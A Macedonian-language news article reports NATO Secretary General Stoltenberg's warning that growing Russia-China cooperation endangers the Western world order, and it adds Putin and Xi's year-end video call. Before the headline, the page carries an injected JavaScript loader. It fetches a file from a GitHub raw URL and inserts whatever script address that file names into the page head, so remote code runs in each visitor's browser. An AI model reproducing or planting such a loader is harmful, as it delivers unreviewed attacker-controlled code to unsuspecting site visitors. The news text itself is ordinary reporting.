;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); НАТО: Зголемената соработка меѓу Русија и Кина го загрозува светскиот поредок - Антропол
АктуелноЛокално

НАТО: Зголемената соработка меѓу Русија и Кина го загрозува светскиот поредок

Зголемената соработка помеѓу Русија и Кина го загрозува светскиот поредок воспоставен од западните земји, изјави генералниот секретар на НАТО Јенс Столтенберг на конференција во Норвешка.

Нив ги обединува фактот дека сакаат поинаков светски поредок. Тие не ги делат нашите вредности и се обидуваат да ги одбранат интересите што ја нарушуваат нашата верба во слободата и демократијата. Во овој опасен свет, земјите од алијансата мора да се држат заедно“, додаде Столтенберг.

Главниот доказ за соработка меѓу двете земји, генералниот секретар го нарече одбивањето на Пекинг да ја осуди руската специјална операција во Украина.

Напротив, Кина го турка рускиот наратив, обвинувајќи го НАТО за сегашната ситуација и за прв пат го поддржа барањето на Русија, Алијансата да ги затвори вратите за нови членки“, додаде Столтенберг.

Покрај тоа, тој го истакна продлабочувањето на односите меѓу Москва и Пекинг во воената и економската сфера.

Столтенберг исто така изјави дека не очекува нормализација на односите со Русија по завршувањето на конфликтот во Украина, бидејќи Москва, според него, сака да види „друга Европа“. Според него, без оглед на тоа како ќе заврши украинскиот конфликт, мора да се констатира дека „безбедносната ситуација во Европа е целосно променета“. Тој ја обвини Русија дека се обидува да ги контролира соседните земји. Ова ја става Русија во позиција на постојан конфликт со Западот, вели Столтенберг, кој оваа година треба да се повлече од функцијата генерален секретар на НАТО.

Инаку Владимир Путин и Си Џинпинг пред Нова година разговараа преку видео врска, каде kинескиот претседател истакна дека е подготвен да ја зајакне стратешката соработка со Москва и да работи со неа за заштита на суверенитетот и безбедноста на двете земји. Рускиот лидер, од своја страна, кажа дека важноста на руско-кинеското стратешко партнерство како стабилизирачки фактор расте во контекст на растечките геополитички тензии. Според него, координацијата меѓу Москва и Пекинг служи за создавање праведен светски поредок.